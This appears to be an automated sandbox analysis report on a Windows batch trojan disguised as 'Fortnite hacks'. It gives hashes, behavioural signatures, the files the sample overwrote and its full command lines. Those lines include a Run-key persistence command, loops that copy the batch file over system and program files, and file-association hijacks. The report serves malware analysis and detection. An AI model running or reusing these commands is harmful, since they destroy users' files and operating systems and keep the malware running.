Resubmissions
- 09/03/2025, 01:58  250309-cdv29swybs  score 10
- 08/03/2025, 06:55  250308-hp35xatjt9  score 10
- 08/03/2025, 04:53  250308-fh1ebssky5  score 10

Analysis
- max time kernel: 85s
- max time network: 156s
- platform: windows11-21h2_x64
- resource: win11-20250217-en
- resource tags: arch:x64, arch:x86, image:win11-20250217-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08/03/2025, 06:55
Behavioral tasks (resource win11-20250217-en unless noted otherwise)
- behavioral1: My-Skidded-malwares-main.zip
- behavioral2: My-Skidded-malwares-main/6abdd72e82088f5aab90dc9e02f2d9781cea1b3f1c84b3f16df4810956f68ef2.exe
- behavioral3: My-Skidded-malwares-main/AmongUs.vbs
- behavioral4: My-Skidded-malwares-main/AnaRAT.exe
- behavioral5: My-Skidded-malwares-main/CRINGE-DO-NOT-RUN.exe
- behavioral6: My-Skidded-malwares-main/Cirno.exe
- behavioral7: My-Skidded-malwares-main/Cool Game MAKR 2022!!.zip
- behavioral8: My-Skidded-malwares-main/DAMK.exe (win11-20250218-en)
- behavioral9: My-Skidded-malwares-main/Dell_Fuck.vbs
- behavioral10: My-Skidded-malwares-main/Discord Expliot Kit.exe
- behavioral11: My-Skidded-malwares-main/ERROR 2.bat
- behavioral12: My-Skidded-malwares-main/ERROR.vbs
- behavioral13: My-Skidded-malwares-main/Fello_s_Revenge.exe
- behavioral14: My-Skidded-malwares-main/Fellos RAT-Pack.exe
- behavioral15: My-Skidded-malwares-main/KonataMBR.exe
- behavioral16: My-Skidded-malwares-main/KonoSuba.vbs
- behavioral17: My-Skidded-malwares-main/MarisaFumoDownload.exe
- behavioral18: My-Skidded-malwares-main/MarisaMBR.exe
- behavioral19: My-Skidded-malwares-main/Marlon2210FACEREVEAL.exe
- behavioral20: My-Skidded-malwares-main/Marlon2210KeyGen.exe (win11-20250218-en)
- behavioral21: My-Skidded-malwares-main/Megumin.exe
- behavioral22: My-Skidded-malwares-main/NazrinMBR.exe
- behavioral23: My-Skidded-malwares-main/PCCooker2.0_x64.exe
- behavioral24: My-Skidded-malwares-main/PCCooker_x64.exe
- behavioral25: My-Skidded-malwares-main/PanKoza2.0 Discord Token Stealer 2024.exe
- behavioral26: My-Skidded-malwares-main/README.md
- behavioral27: My-Skidded-malwares-main/RaM KilLEr 1.0.bat
- behavioral28: My-Skidded-malwares-main/Rias.exe
- behavioral29: My-Skidded-malwares-main/Run All.bat
- behavioral30: My-Skidded-malwares-main/TouhouHacks.exe
- behavioral31: My-Skidded-malwares-main/Trojan.Aqua.exe (win11-20250218-en)
- behavioral32: My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
General
- Target: My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
- Size: 34KB
- MD5: ac04b6f6fa293c4b55c4c8b49372a9ec
- SHA1: 9dfca519218c3c10203163454f1237916b0655cc
- SHA256: 273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
- SHA512: b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
- SSDEEP: 192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi
Malware Config

Signatures

Drops file in Drivers directory (4 IoCs; process cmd.exe)
- File created: C:\Windows\SysWOW64\drivers\gmreadme.txt
- File opened for modification: C:\Windows\System32\drivers\gmreadme.txt
- File created: C:\Windows\System32\drivers\gmreadme.txt
- File opened for modification: C:\Windows\SysWOW64\drivers\gmreadme.txt

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoC; process reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_12735_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat"
Drops file in System32 directory (64 IoCs; process cmd.exe)
- File created: C:\Windows\System32\appidpolicyconverter.exe
- File opened for modification: C:\Windows\System32\SearchProtocolHost.exe
- File created: C:\Windows\SysWOW64\forfiles.exe
- File opened for modification: C:\Windows\SysWOW64\mshta.exe
- File opened for modification: C:\Windows\SysWOW64\OposHost.exe
- File opened for modification: C:\Windows\SysWOW64\setupugc.exe
- File opened for modification: C:\Windows\System32\printui.exe
- File opened for modification: C:\Windows\System32\proquota.exe
- File created: C:\Windows\System32\taskhostw.exe
- File created: C:\Windows\System32\SystemResetPlatform\SystemResetPlatform.exe
- File created: C:\Windows\SysWOW64\SystemPropertiesProtection.exe
- File created: C:\Windows\System32\DeviceCredentialDeployment.exe
- File created: C:\Windows\System32\net1.exe
- File created: C:\Windows\System32\Netplwiz.exe
- File opened for modification: C:\Windows\System32\where.exe
- File opened for modification: C:\Windows\SysWOW64\CloudNotifications.exe
- File created: C:\Windows\SysWOW64\sc.exe
- File created: C:\Windows\SysWOW64\shutdown.exe
- File created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- File created: C:\Windows\SysWOW64\fsutil.exe
- File opened for modification: C:\Windows\SysWOW64\systeminfo.exe
- File opened for modification: C:\Windows\System32\ddodiag.exe
- File created: C:\Windows\SysWOW64\mcbuilder.exe
- File created: C:\Windows\System32\lpksetup.exe
- File opened for modification: C:\Windows\System32\rmttpmvscmgrsvr.exe
- File opened for modification: C:\Windows\System32\SystemPropertiesDataExecutionPrevention.exe
- File created: C:\Windows\System32\verclsid.exe
- File opened for modification: C:\Windows\SysWOW64\findstr.exe
- File opened for modification: C:\Windows\SysWOW64\fsutil.exe
- File created: C:\Windows\SysWOW64\msdt.exe
- File opened for modification: C:\Windows\SysWOW64\winver.exe
- File opened for modification: C:\Windows\System32\DisplaySwitch.exe
- File opened for modification: C:\Windows\System32\setupugc.exe
- File created: C:\Windows\System32\write.exe
- File opened for modification: C:\Windows\System32\WWAHost.exe
- File created: C:\Windows\System32\lsass.exe
- File opened for modification: C:\Windows\System32\powercfg.exe
- File opened for modification: C:\Windows\System32\sdiagnhost.exe
- File created: C:\Windows\System32\dusmtask.exe
- File opened for modification: C:\Windows\System32\mavinject.exe
- File opened for modification: C:\Windows\System32\wslg.exe
- File opened for modification: C:\Windows\SysWOW64\whoami.exe
- File opened for modification: C:\Windows\System32\tskill.exe
- File opened for modification: C:\Windows\System32\UserAccountBroker.exe
- File created: C:\Windows\SysWOW64\prevhost.exe
- File opened for modification: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk
- File opened for modification: C:\Windows\System32\AtBroker.exe
- File opened for modification: C:\Windows\System32\DWWIN.EXE
- File created: C:\Windows\SysWOW64\ndadmin.exe
- File opened for modification: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
- File opened for modification: C:\Windows\System32\replace.exe
- File opened for modification: C:\Windows\System32\dfrgui.exe
- File created: C:\Windows\System32\gpresult.exe
- File created: C:\Windows\System32\HOSTNAME.EXE
- File opened for modification: C:\Windows\System32\IESettingSync.exe
- File created: C:\Windows\System32\TapiUnattend.exe
- File created: C:\Windows\SysWOW64\calc.exe
- File opened for modification: C:\Windows\SysWOW64\taskkill.exe
- File opened for modification: C:\Windows\SysWOW64\PackagedCWALauncher.exe
- File created: C:\Windows\System32\alg.exe
- File created: C:\Windows\System32\winload.exe
- File opened for modification: C:\Windows\SysWOW64\wermgr.exe
- File created: C:\Windows\SysWOW64\WWAHost.exe
- File created: C:\Windows\SysWOW64\IME\IMEJP\IMJPDCT.EXE
Drops file in Program Files directory (64 IoCs; process cmd.exe)
- File created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt
- File opened for modification: C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe
- File opened for modification: C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe
- File created: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\notification_helper.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\BHO\ie_to_edge_stub.exe
- File created: C:\Program Files (x86)\Windows Media Player\wmpshare.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\lij.txt
- File opened for modification: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\Products.txt
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\msoev.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\sl.txt
- File opened for modification: C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt
- File created: C:\Program Files\Internet Explorer\iexplore.exe
- File opened for modification: C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe
- File created: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\pwahelper.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\uz.txt
- File created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
- File created: C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_x64__8wekyb3d8bbwe\Todo.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe
- File created: C:\Program Files (x86)\Windows Mail\wabmig.exe
- File created: C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt
- File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
- File opened for modification: C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT
- File opened for modification: C:\Program Files\7-Zip\History.txt
- File opened for modification: C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT
- File opened for modification: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt
- File opened for modification: C:\Program Files\Java\jdk-1.8\bin\servertool.exe
- File opened for modification: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\sv.txt
- File opened for modification: C:\Program Files\7-Zip\Lang\sw.txt
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt
- File opened for modification: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_should.help.txt
- File opened for modification: C:\Program Files\Java\jre-1.8\bin\javaw.exe
- File opened for modification: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE
- File created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerElevatedAppServiceClient.exe
- File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf
- File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt
- File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT
- File opened for modification: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Cortana.exe
- File opened for modification: C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateCore.exe
- File opened for modification: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
- File created: C:\Program Files\Internet Explorer\ieinstal.exe
- File opened for modification: C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\XboxStub.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\ext.txt
- File opened for modification: C:\Program Files\7-Zip\Lang\lv.txt
- File opened for modification: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt
- File opened for modification: C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe
- File opened for modification: C:\Program Files\Mozilla Firefox\plugin-container.exe
- File opened for modification: C:\Program Files\Windows Media Player\setup_wm.exe
- File created: C:\Program Files (x86)\Internet Explorer\ExtExport.exe
- File opened for modification: C:\Program Files\7-Zip\Lang\cs.txt
- File opened for modification: C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt
- File opened for modification: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt
- File created: C:\Program Files\Internet Explorer\iediagcmd.exe
Drops file in Windows directory (64 IoCs; process cmd.exe)
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe
- File created: C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\doskey.exe
- File created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
- File opened for modification: C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-blb-engine-main_31bf3856ad364e35_10.0.22000.1_none_3a25939e0488fc49\wbengine.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-m..ndation-frameserver_31bf3856ad364e35_10.0.22000.469_none_b104ba5249e06dec\r\FsIso.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-recoverydrive_31bf3856ad364e35_10.0.22000.132_none_23ef129810e14356\r\RecoveryDrive.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_3af3f70bfdcd4fb1\change.exe
- File opened for modification: C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.22000.1_none_1be9c0745b95a762\MpCmdRun.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-windowscodecraw_31bf3856ad364e35_10.0.22000.132_none_9aa67d897151144d\WindowsCodecsRaw.txt
- File opened for modification: C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\f\PeopleExperienceHost.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.318_none_c7ea7e014d4524f4\AppVShNotify.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.22000.318_none_569ec118f1c50925\f\winload.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\Setup.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\LaunchTM.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.22000.318_none_349d8ac96fe3d679\f\appidtel.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-s..e.desktop.searchapp_31bf3856ad364e35_10.0.22000.1_none_e4512f709bf99514\7.txt
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-onecore-i..atedusermode-kernel_31bf3856ad364e35_10.0.22000.348_none_e313cfb919daa6b1\securekernel.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\ResetEngine.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-c..plus-setup-migregdb_31bf3856ad364e35_10.0.22000.1_none_8de8e95b9cda88b4\MigRegDB.exe
- File opened for modification: C:\Windows\WinSxS\x86_wpf-presentationhostexe_31bf3856ad364e35_10.0.22000.1_none_6a1935736c898073\PresentationHost.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-g..ation-wincomponents_31bf3856ad364e35_10.0.22000.1_none_f20a18a4fd0f4d43\LocationNotificationWindows.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\r\msconfig.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-nbtstat_31bf3856ad364e35_10.0.22000.1_none_f4542218232805ca\nbtstat.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-p..ncetoolscommandline_31bf3856ad364e35_10.0.22000.1_none_b7671877039e31c8\relog.exe
- File created: C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE
- File opened for modification: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
- File opened for modification: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
- File created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- File created: C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.22000.348_none_30982568e4ff2521\f\vmwp.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-ux-dlg_31bf3856ad364e35_10.0.22000.1_none_f49ae11ddec89744\UpgradeResultsUI.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\audit.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\r\systemreset.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-s..e.desktop.searchapp_31bf3856ad364e35_10.0.22000.1_none_e4512f709bf99514\18.txt
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-client-li..m-service-migration_31bf3856ad364e35_10.0.22000.120_none_9268b7169b04c4a6\r\ClipUp.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-where_31bf3856ad364e35_10.0.22000.1_none_b416d6c5e2f3a677\where.exe
- File created: C:\Windows\WinSxS\amd64_netfx4-aspnet_regiis_exe_b03f5f7f11d50a3a_4.0.15806.0_none_814d9cd431d93bd0\aspnet_regiis.exe
- File opened for modification: C:\Windows\WinSxS\amd64_security-octagon-broker_31bf3856ad364e35_10.0.22000.1_none_b04edc9391a3bdbd\SgrmLpac.exe
- File opened for modification: C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.22000.1_none_1be9c0745b95a762_mpdlpcmd.exe_f16d1925
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\SpatialAudioLicenseSrv.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-explorer-shortcuts_31bf3856ad364e35_10.0.22000.51_none_99f76de22cbda898\05 - Device Manager.lnk
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-ie-ielowutil_31bf3856ad364e35_11.0.22000.1_none_90ab24a4e0ddab72\ielowutil.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_688486d306b27285\msinfo32.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-refsutil_31bf3856ad364e35_10.0.22000.1_none_40fab150342df168\refsutil.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-security-tools-klist_31bf3856ad364e35_10.0.22000.282_none_3c5af3814be830ab\r\klist.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\Setup.exe
- File opened for modification: C:\Windows\WinSxS\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\SenseIR.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.22000.1_none_7b92f89679249548\wmlaunch.exe
- File created: C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-windowscodecraw_31bf3856ad364e35_10.0.22000.132_none_9051d3373cf05252\f\WindowsCodecsRaw.txt
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-d..directplay8-payload_31bf3856ad364e35_10.0.22000.1_none_59c3860dc8ae77d0\dpnsvr.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\f\WerFaultSecure.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-migrationengine_31bf3856ad364e35_10.0.22000.348_none_53ff6ed560767984\r\mighost.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\r\Narrator.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrshost.exe
- File created: C:\Windows\WinSxS\wow64_microsoft-windows-where_31bf3856ad364e35_10.0.22000.1_none_be6b811817546872\where.exe
- File created: C:\Windows\WinSxS\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\r\SearchIndexer.exe
- File created: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.22000.493_none_7f8453c6e0afd8f5\nvspinfo.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-m..-odbc-administrator_31bf3856ad364e35_10.0.22000.1_none_9a93850442801f9d\odbcad32.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-sysinfo_31bf3856ad364e35_10.0.22000.1_none_45984ec0fd57e0f5\systeminfo.exe
- File opened for modification: C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe
- File opened for modification: C:\Windows\WinSxS\amd64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_bc172f1a0215d298\f\wevtutil.exe
Modifies registry class (14 IoCs; process cmd.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.doc
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile"
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.exe
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile"
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile"
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile"
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.txt
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3

Suspicious use of WriteProcessMemory (26 IoCs; source PID 1320 cmd.exe, each pair logged twice)
- PID 1320 wrote to memory of PID 4412 (procid_target 82)
- PID 1320 wrote to memory of PID 4876 (procid_target 84)
- PID 1320 wrote to memory of PID 4852 (procid_target 85)
- PID 1320 wrote to memory of PID 2436 (procid_target 87)
- PID 1320 wrote to memory of PID 2044 (procid_target 88)
- PID 1320 wrote to memory of PID 1644 (procid_target 89)
- PID 1320 wrote to memory of PID 1572 (procid_target 90)
- PID 1320 wrote to memory of PID 4800 (procid_target 91)
- PID 1320 wrote to memory of PID 1120 (procid_target 92)
- PID 1320 wrote to memory of PID 5056 (procid_target 94)
- PID 1320 wrote to memory of PID 4264 (procid_target 95)
- PID 1320 wrote to memory of PID 2136 (procid_target 96)
- PID 1320 wrote to memory of PID 5072 (procid_target 97)
Processes
- C:\Windows\system32\cmd.exe (PID 1320)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  Children:
  - C:\Windows\system32\reg.exe (PID 4412)
    Command line: reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_12735_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
    Signatures: Adds Run key to start application
  - C:\Windows\system32\cmd.exe (PID 4876)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 4852)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (PID 2436)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 2044)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    Signatures: Drops file in System32 directory; Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (PID 1644)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 1572)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    Signatures: Drops file in Program Files directory
  - C:\Windows\system32\cmd.exe (PID 4800)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 1120)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
    Signatures: Drops file in Drivers directory; Drops file in Program Files directory; Drops file in Windows directory
  - C:\Windows\system32\cmd.exe (PID 5056)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 4264)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  - C:\Windows\system32\cmd.exe (PID 2136)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  - C:\Windows\system32\cmd.exe (PID 5072)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
